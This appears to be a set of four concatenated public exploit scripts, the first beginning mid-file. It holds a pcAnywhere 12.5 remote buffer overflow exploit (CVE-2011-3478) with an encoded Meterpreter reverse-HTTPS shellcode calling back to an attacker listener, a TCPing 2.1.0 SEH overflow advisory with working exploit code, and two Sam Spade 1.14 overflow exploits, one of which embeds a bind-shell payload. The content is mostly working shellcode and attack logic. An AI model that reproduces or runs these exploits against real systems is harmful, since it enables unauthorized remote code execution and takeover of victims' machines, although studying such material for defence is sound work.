--platform windows -p windows/meterpreter/reverse_https LHOST=192.168.80.223 LPORT=443 EXITFUNC=seh -e x86/shikata_ga_nai -b '\x00' -f python -v shellcode # >>> MODIFY THIS >>> shellcode = "" shellcode += "\xda\xd3\xd9\x74\x24\xf4\xbf\x2c\x46\x39\x97\x5d" shellcode += "\x33\xc9\xb1\x87\x83\xed\xfc\x31\x7d\x14\x03\x7d" shellcode += "\x38\xa4\xcc\x6b\xa8\xaa\x2f\x94\x28\xcb\xa6\x71" shellcode += "\x19\xcb\xdd\xf2\x09\xfb\x96\x57\xa5\x70\xfa\x43" shellcode += "\x3e\xf4\xd3\x64\xf7\xb3\x05\x4a\x08\xef\x76\xcd" shellcode += "\x8a\xf2\xaa\x2d\xb3\x3c\xbf\x2c\xf4\x21\x32\x7c" shellcode += "\xad\x2e\xe1\x91\xda\x7b\x3a\x19\x90\x6a\x3a\xfe" shellcode += "\x60\x8c\x6b\x51\xfb\xd7\xab\x53\x28\x6c\xe2\x4b" shellcode += "\x2d\x49\xbc\xe0\x85\x25\x3f\x21\xd4\xc6\xec\x0c" shellcode += "\xd9\x34\xec\x49\xdd\xa6\x9b\xa3\x1e\x5a\x9c\x77" shellcode += "\x5d\x80\x29\x6c\xc5\x43\x89\x48\xf4\x80\x4c\x1a" shellcode += "\xfa\x6d\x1a\x44\x1e\x73\xcf\xfe\x1a\xf8\xee\xd0" shellcode += "\xab\xba\xd4\xf4\xf0\x19\x74\xac\x5c\xcf\x89\xae" shellcode += "\x3f\xb0\x2f\xa4\xad\xa5\x5d\xe7\xb9\x57\x3b\x6c" shellcode += "\x39\xc0\xb4\xe5\x57\x79\x6f\x9e\xeb\x0e\xa9\x59" shellcode += "\x0c\x25\x84\xbe\xa1\x95\xb4\x13\x16\x72\x01\xc2" shellcode += "\xe1\x25\x8a\x3f\x42\x79\x1f\xc3\x37\x2e\xb7\x78" shellcode += "\xb6\xd0\x47\x97\x86\xd1\x47\x67\xd9\x84\x3f\x54" shellcode += "\x6e\x11\x95\xaa\x3a\x37\x6f\xa8\xf7\xbe\xf8\x1d" shellcode += "\x4c\x16\x73\x50\x25\xc2\x0c\xa6\x91\xc1\xb0\x8b" shellcode += "\x53\x69\x76\x22\xd9\x46\x0a\x1a\xbc\xea\x87\xf9" shellcode += "\x09\xb2\x10\xcf\x14\x3c\xd0\x56\xb3\xc8\xba\xe0" shellcode += "\x69\x5a\x3a\xa2\xff\xf0\xf2\x73\x92\x4b\x79\x10" shellcode += "\x02\x3f\x4f\xdc\x8f\xdb\xe7\x4f\x6d\x1d\xa9\x1d" shellcode += "\x42\x0c\x70\x80\xcc\xe9\xe5\x0a\x55\x80\x8a\xc2" shellcode += "\x3d\x2a\x2f\xa5\xe2\xf1\xfe\x7d\x2a\x86\x6b\x08" shellcode += "\x27\x33\x2a\xbb\xbf\xf9\xd9\x7a\x7d\x87\x4f\x10" shellcode += "\xed\x0d\x1b\xad\x88\xc6\xb8\x50\x07\x6a\x74\xf1" shellcode += "\xd3\x2d\xd9\x84\x4e\xc0\x8e\x25\x23\x76\x60\xc9" shellcode += "\xb4\xd9\xf5\x64\x0e\x8e\xa6\x22\x05\x39\x3f\x98" shellcode += "\x96\x8e\xca\x4f\x79\x54\x64\x26\x33\x3d\xe7\xaa" shellcode += "\xa2\xb1\x90\x59\x4b\x74\x1a\xce\xf9\x0a\xc6\xd8" shellcode += "\xcc\x99\x49\x75\x47\x33\x0e\x1c\xd5\xf9\xde\xad" shellcode += "\xa3\x8c\x1e\x02\x3b\x38\x96\x3d\x7d\x39\x7d\xc8" shellcode += "\x47\x95\x16\xcb\x75\xfa\x63\x98\x2a\xa9\x3c\x4c" shellcode += "\x9a\x25\x28\x27\x0c\x8d\x51\x1d\xc6\x9b\xa7\xc1" shellcode += "\x8e\xdb\x8b\xfd\x4e\x55\x0b\x97\x4a\x35\xa6\x77" shellcode += "\x04\xdd\x43\xce\x36\x9b\x53\x1b\x15\xf7\xf8\xf7" shellcode += "\xcf\x9f\xd3\xf1\xf7\x24\xd3\x2b\x82\x1b\x5e\xdc" shellcode += "\xc3\xee\x78\x34\x90\x10\x7b\xc5\x4c\x51\x13\xc5" shellcode += "\x80\x51\xe3\xad\xa0\x51\xa3\x2d\xf3\x39\x7b\x8a" shellcode += "\xa0\x5c\x84\x07\xd5\xcc\x28\x21\x3e\xa5\xa6\x31" shellcode += "\xe0\x4a\x37\x61\xb6\x22\x25\x13\xbf\x51\xb6\xce" shellcode += "\x3a\x55\x3d\x3e\xcf\x51\xbf\x03\x4a\x9d\xca\x66" shellcode += "\x0c\xdd\x6a\x81\xdb\x1e\x6b\xae\x12\xd8\xa6\x7f" shellcode += "\x65\x2c\xff\x51\xbd\x60\xd1\x9f\x8f\xb3\x2d\x5b" shellcode += "\x11\xbd\x1f\x71\x87\xc2\x0c\x7a\x82\xa9\xb2\x47" ################################ ### BUFFER OVERFLOW ### ### STRING CONSTRUCTION ### ################################ # Calculate address values based on the OS offset pointerLocationAddress = OSdictionary['Offset'] + 0x00005ad8 pointerForECXplus8Address = OSdictionary['Offset'] + 0x00005ad4 breakPointAddress = OSdictionary['Offset'] + 0x000065af - 0x00010000 # jump over the next 38 bytes (to the begining of the shellcode) jumpToShellcode = "\xeb\x26\x90\x90" # pointerLocationAddress - the memory address location of the "pointerForECXplus8" variable pointerLocation = struct.pack('<L', pointerLocationAddress) # CALL ESI from the application module ijl20.dll [aslr=false,rebase=false,safeseh=false] callESI = struct.pack('<L', 0x67f7ab23) # pointerForECXplus8Address - the memory address location of the start of the DDDD string in the shellcode (Offset + 0x00005acc + 0x8) pointerForECXplus8 = struct.pack('<L', pointerForECXplus8Address) # construct the password string which will cause a buffer overflow condition and exploit the vulnerability passwordString = ( "A" * 945 + jumpToShellcode + pointerLocation + "D" * 4 + pointerForECXplus8 + callESI + "\x90" * 20 + shellcode + "I" * (1289 - len(shellcode)) + "\xaa" * (OSdictionary['PasswordStringLength'] - 945 - 4 * 5 - 20 - 1289) ) ################################ ### FUNCTIONS ### ################################ # calculate and return the median value of the argument list def calculateMedian(targetList): sortedTargetList = sorted(targetList) targetListLength = len(targetList) medianIndex = (targetListLength - 1) / 2 if (targetListLength % 2): return sortedTargetList[medianIndex] else: return ((sortedTargetList[medianIndex] + sortedTargetList[medianIndex + 1]) / 2) # print an indented line with a type prefix def printLine(infoType, indentDepth, textToDisplay): # [I]nformational if infoType == "I": print (' ' * indentDepth), print "\033[1;37m[*]\033[1;m", textToDisplay # [E]rror elif infoType == "E": print (' ' * indentDepth), print "\033[1;31m[-]\033[1;m", textToDisplay # [S]uccess elif infoType == "S": print (' ' * indentDepth), print "\033[1;32m[+]\033[1;m", textToDisplay # [W]arning elif infoType == "W": print (' ' * indentDepth), print "\033[1;33m[!]\033[1;m", textToDisplay # [N]one elif infoType == "N": print (' ' * indentDepth), print textToDisplay # print the banner - general exploit info, target info, target OS statistics def printBanner(): printLine ("I", 0, "Symantec pcAnywhere v12.5.0 Build 442 Login+Password field") printLine ("N", 1, "Buffer Overflow Remote Code Execution exploit (CVE-2011-3478)") printLine ("I", 1, "by Tomislav Paskalev") printLine ("I", 0, "Target server information") printLine ("I", 1, "IP address : " + targetServer) printLine ("I", 1, "Port : " + str(targetPort)) printLine ("I", 0, "Exploit target information") printLine ("I", 1, "Target OS : " + OSdictionary['Version']) printLine ("I", 2, "Offset : " + "{:#010x}".format(OSdictionary['Offset'])) printLine ("I", 2, "Breakpoint (test) : " + "{:#010x}".format(breakPointAddress)) printLine ("I", 2, "Password length : " + str(OSdictionary['PasswordStringLength'])) printLine ("I", 2, "Test result stats") printLine ("I", 3, "Test count : " + str(len(OSdictionary['TestAttempts']))) printLine ("I", 3, "Reliability : " + str(((len(OSdictionary['TestAttempts']) - OSdictionary['TestAttempts'].count(0)) * 100) / len(OSdictionary['TestAttempts'])) + "%") printLine ("I", 3, "Min attempt : " + str(min([element for element in OSdictionary['TestAttempts'] if element > 0]))) printLine ("I", 3, "Max attempt : " + str(max(OSdictionary['TestAttempts']))) printLine ("I", 3, "Avg attempt : " + str(sum(OSdictionary['TestAttempts']) / len(OSdictionary['TestAttempts']))) printLine ("I", 3, "Median attempt: " + str(calculateMedian(OSdictionary['TestAttempts']))) # connect to the server and return the socket def connectToServer(server, port): # create socket targetSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: targetSocket.connect((server, port)) except socket.error as msg: if "[Errno 111] Connection refused" in str(msg): return None # return the opened socket return targetSocket # send the data to the server and return the response def sendDataToServer(destSocket, dataToSend): destSocket.send(dataToSend) try: receivedData = destSocket.recv(1024) except socket.error as msg: if "[Errno 104] Connection reset by peer" in str(msg): return None return receivedData # run the exploit; exits when finished or interrupted def runExploit(): printLine ("I", 0, "Starting exploit...") attemptCounter = 0 # brute force the service until the shellcode is successfully executed while True: # connect to the target server openSocket = connectToServer(targetServer, targetPort) attemptCounter += 1 sleepTimer = 0 printLine ("I", 1, "Attempt no. " + str(attemptCounter)) printLine ("I", 2, "Sending initialisation sequence...") # send the data; check outcome while True: receivedData = sendDataToServer(openSocket, initialisationSequence) # check if server responded properly, if yes exit the loop if receivedData: if "Please press <Enter>..." in receivedData: break # exit if the service is unavailable if attemptCounter == 1: printLine ("E", 3, "Service unavailable") printLine ("I", 4, "Exiting...") exit(1) # check if shellcode executed (based on a timer) if sleepTimer > shellcodeExecutionTimeout: print "" printLine ("S", 4, "Shellcode executed after " + str(attemptCounter - 1) + " attempts") printLine ("I", 5, "Exiting...") exit(1) # print waiting ticks sys.stdout.write('\r') sys.stdout.write(" \033[1;33m[!]\033[1;m Connection reset - reinitialising%s" % ('.' * sleepTimer)) sys.stdout.flush() # sleep one second and reconnect time.sleep(1) sleepTimer += 1 openSocket.close() openSocket = connectToServer(targetServer, targetPort) if sleepTimer > 0: print "" printLine ("I", 2, "Sending handshake sequence...") openSocket.send(handshakeSequence) time.sleep(3) data = openSocket.recv(1024) printLine ("I", 2, "Sending username...") openSocket.send(usernameString) time.sleep(3) printLine ("I", 2, "Sending password...") openSocket.send(passwordString) openSocket.close() time.sleep(3) # main function if __name__ == "__main__": printBanner() try: runExploit() except KeyboardInterrupt: print "" sys.exit() # End of file

''' [+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-TCPING-2.1.0-BUFFER-OVERFLOW.txt Vendor: ================================ Spetnik.com http://tcping.soft32.com/free-download/ Product: ================================= Spetnik TCPing 2.1.0 / tcping.exe circa 2007 TCPing "pings" a server on a specific port using TCP/IP by opening and closing a connection on the specified port. Results are returned in a similar fashion to that of Microsoft Windows Ping. This application is intended for use in testing for open ports on remote machines, or as an alternative to the standard "ping" in a case where ICMP packets are blocked or ignored. Vulnerability Type: =================== Buffer Overflow CVE Reference: ============== N/A Vulnerability Details: ===================== If TCPing is called with an specially crafted CL argument we will cause exception and overwrite the Pointers to next SEH record and SEH handler with our buffer and malicious shellcode. No suitable POP POP RET address is avail in TCPing as they start with null bytes 0x00 and will break our shellcode. However, TCPing is not compiled with SafeSEH which is a linker option, so we can grab an address from another module that performs POP POP RET instructions to acheive arbitrary code execution on victims system. stack dump... EAX 00000045 ECX 0040A750 tcping.0040A750 EDX 41414141 EBX 000002CC ESP 0018FA50 EBP 0018FA50 ESI 0018FD21 ASCII "rror: Unknown host AAAAAA.... EDI 0018FCC8 EIP 0040270A tcping.0040270A C 0 ES 002B 32bit 0(FFFFFFFF) P 1 CS 0023 32bit 0(FFFFFFFF) A 1 SS 002B 32bit 0(FFFFFFFF) Z 0 DS 002B 32bit 0(FFFFFFFF) S 0 FS 0053 32bit 7EFDD000(FFF) T 0 GS 002B 32bit 0(FFFFFFFF) D 0 O 0 LastErr WSANO_DATA (00002AFC) EFL 00010216 (NO,NB,NE,A,NS,PE,GE,G) WinDBG dump... (17a8.149c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** WARNING: Unable to verify checksum for image00400000 *** ERROR: Module load completed but symbols could not be loaded for image00400000 eax=00000045 ebx=00000222 ecx=0040a750 edx=41414141 esi=0018fd21 edi=0018fcc8 eip=0040270a esp=0018fa50 ebp=0018fa50 iopl=0 nv up ei pl nz ac pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216 image00400000+0x270a: 0040270a 8802 mov byte ptr [edx],al ds:002b:41414141=?? Exploit code(s): =============== Python script... ''' import struct,os,subprocess #Spetnik TCPing Utility 2.1.0 #buffer overflow SEH exploit #by hyp3rlinx #pop calc.exe Windows 7 SP1 sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B" "\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B" "\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31" "\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA" "\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14" "\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65" "\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC") vulnpgm="C:\\tcping.exe " nseh="\xEB\x06"+"\x90"*2 #JMP TO OUR SHELLCODE seh=struct.pack('<L', 0x77214f99) #POP POP RET payload="A"*580+nseh+seh+sc+"\x90"*20 #BOOOOOOOM! subprocess.Popen([vulnpgm, payload], shell=False) ''' Exploitation Technique: ======================= Local Severity Level: ========================================================= High =========================================================== [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx '''

# Exploit Title : Sam Spade 1.14 - Buffer OverFlow # Date : 10/30/2015 # Exploit Author : MandawCoder # Contact : MandawCoder@gmail.com # Vendor Homepage : http://samspade.org # Software Link : http://www.majorgeeks.com/files/details/sam_spade.html # Version : 1.14 # Tested on : XP Professional SP3 En x86 # Category : Local Exploit # Description: # bug is on this section == Tools -> Crawl website... # Execute following exploit, then delete "http://" from "CRAWL all URLs below" part, then paste the content of file.txt into mentioned section. # # this section(and other sections as well) also has SEH buffer overflow ... I would really appreciated if someone Exploit it. f = open("file.txt", "w") Junk = "A"*503 addr = "\x53\x93\x42\x7E" space = "AAAA" nop="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" # Shellcode: # windows/exec - 277 bytes # CMD=calc.exe shellcode= ("\xba\x1c\xb4\xa5\xac\xda\xda\xd9\x74\x24\xf4\x5b\x29\xc9\xb1" "\x33\x31\x53\x12\x83\xeb\xfc\x03\x4f\xba\x47\x59\x93\x2a\x0e" "\xa2\x6b\xab\x71\x2a\x8e\x9a\xa3\x48\xdb\x8f\x73\x1a\x89\x23" "\xff\x4e\x39\xb7\x8d\x46\x4e\x70\x3b\xb1\x61\x81\x8d\x7d\x2d" "\x41\x8f\x01\x2f\x96\x6f\x3b\xe0\xeb\x6e\x7c\x1c\x03\x22\xd5" "\x6b\xb6\xd3\x52\x29\x0b\xd5\xb4\x26\x33\xad\xb1\xf8\xc0\x07" "\xbb\x28\x78\x13\xf3\xd0\xf2\x7b\x24\xe1\xd7\x9f\x18\xa8\x5c" "\x6b\xea\x2b\xb5\xa5\x13\x1a\xf9\x6a\x2a\x93\xf4\x73\x6a\x13" "\xe7\x01\x80\x60\x9a\x11\x53\x1b\x40\x97\x46\xbb\x03\x0f\xa3" "\x3a\xc7\xd6\x20\x30\xac\x9d\x6f\x54\x33\x71\x04\x60\xb8\x74" "\xcb\xe1\xfa\x52\xcf\xaa\x59\xfa\x56\x16\x0f\x03\x88\xfe\xf0" "\xa1\xc2\xec\xe5\xd0\x88\x7a\xfb\x51\xb7\xc3\xfb\x69\xb8\x63" "\x94\x58\x33\xec\xe3\x64\x96\x49\x1b\x2f\xbb\xfb\xb4\xf6\x29" "\xbe\xd8\x08\x84\xfc\xe4\x8a\x2d\x7c\x13\x92\x47\x79\x5f\x14" "\xbb\xf3\xf0\xf1\xbb\xa0\xf1\xd3\xdf\x27\x62\xbf\x31\xc2\x02" "\x5a\x4e") f.write(Junk + addr + space + nop + shellcode) f.close() print "Done"

#!/usr/bin/python # -*- coding: cp1252 -*- # EXPLOIT TITLE: Sam Spade 1.14 Scan from IP address Field Exploit # AUTHOR: VIKRAMADITYA "-OPTIMUS" # Credits: Luis Mart�nez # Date of Testing: 2nd November 2015 # Download Link : https://www.exploit-db.com/apps/7ad7569341d685b4760ba4adecab6def-spade114.exe # Tested On : Windows XP Service Pack 2 # Steps to Exploit # Step 1: Execute this python script # Step 2: This script will create a file called buffer.txt # Step 3: Copy the contents of buffer.txt file # Step 4: Now open Sam Spade 1.14 # Step 5: Go To 'Tools' > 'Scan Addresses...' # Step 6: Paste the contents in 'Scan from IP addresses' input field # Step 7: Connect to the target at port 4444 with ncat/nc file = open('buffer.txt' , 'wb'); buffer = "A"*507 + "\x9f\x43\x30\x5d" #JMP ESP buffer += "\x90"*20 # msfvenom -p windows/shell_bind_tcp -f c -b "\x00\x0a\x0d\x20\x0b\x0c" buffer += ("\xba\x72\x30\xbb\xe7\xdd\xc1\xd9\x74\x24\xf4\x58\x31\xc9\xb1" "\x53\x31\x50\x12\x83\xc0\x04\x03\x22\x3e\x59\x12\x3e\xd6\x1f" "\xdd\xbe\x27\x40\x57\x5b\x16\x40\x03\x28\x09\x70\x47\x7c\xa6" "\xfb\x05\x94\x3d\x89\x81\x9b\xf6\x24\xf4\x92\x07\x14\xc4\xb5" "\x8b\x67\x19\x15\xb5\xa7\x6c\x54\xf2\xda\x9d\x04\xab\x91\x30" "\xb8\xd8\xec\x88\x33\x92\xe1\x88\xa0\x63\x03\xb8\x77\xff\x5a" "\x1a\x76\x2c\xd7\x13\x60\x31\xd2\xea\x1b\x81\xa8\xec\xcd\xdb" "\x51\x42\x30\xd4\xa3\x9a\x75\xd3\x5b\xe9\x8f\x27\xe1\xea\x54" "\x55\x3d\x7e\x4e\xfd\xb6\xd8\xaa\xff\x1b\xbe\x39\xf3\xd0\xb4" "\x65\x10\xe6\x19\x1e\x2c\x63\x9c\xf0\xa4\x37\xbb\xd4\xed\xec" "\xa2\x4d\x48\x42\xda\x8d\x33\x3b\x7e\xc6\xde\x28\xf3\x85\xb6" "\x9d\x3e\x35\x47\x8a\x49\x46\x75\x15\xe2\xc0\x35\xde\x2c\x17" "\x39\xf5\x89\x87\xc4\xf6\xe9\x8e\x02\xa2\xb9\xb8\xa3\xcb\x51" "\x38\x4b\x1e\xcf\x30\xea\xf1\xf2\xbd\x4c\xa2\xb2\x6d\x25\xa8" "\x3c\x52\x55\xd3\x96\xfb\xfe\x2e\x19\x12\xa3\xa7\xff\x7e\x4b" "\xee\xa8\x16\xa9\xd5\x60\x81\xd2\x3f\xd9\x25\x9a\x29\xde\x4a" "\x1b\x7c\x48\xdc\x90\x93\x4c\xfd\xa6\xb9\xe4\x6a\x30\x37\x65" "\xd9\xa0\x48\xac\x89\x41\xda\x2b\x49\x0f\xc7\xe3\x1e\x58\x39" "\xfa\xca\x74\x60\x54\xe8\x84\xf4\x9f\xa8\x52\xc5\x1e\x31\x16" "\x71\x05\x21\xee\x7a\x01\x15\xbe\x2c\xdf\xc3\x78\x87\x91\xbd" "\xd2\x74\x78\x29\xa2\xb6\xbb\x2f\xab\x92\x4d\xcf\x1a\x4b\x08" "\xf0\x93\x1b\x9c\x89\xc9\xbb\x63\x40\x4a\xcb\x29\xc8\xfb\x44" "\xf4\x99\xb9\x08\x07\x74\xfd\x34\x84\x7c\x7e\xc3\x94\xf5\x7b" "\x8f\x12\xe6\xf1\x80\xf6\x08\xa5\xa1\xd2") file.write(buffer); file.close()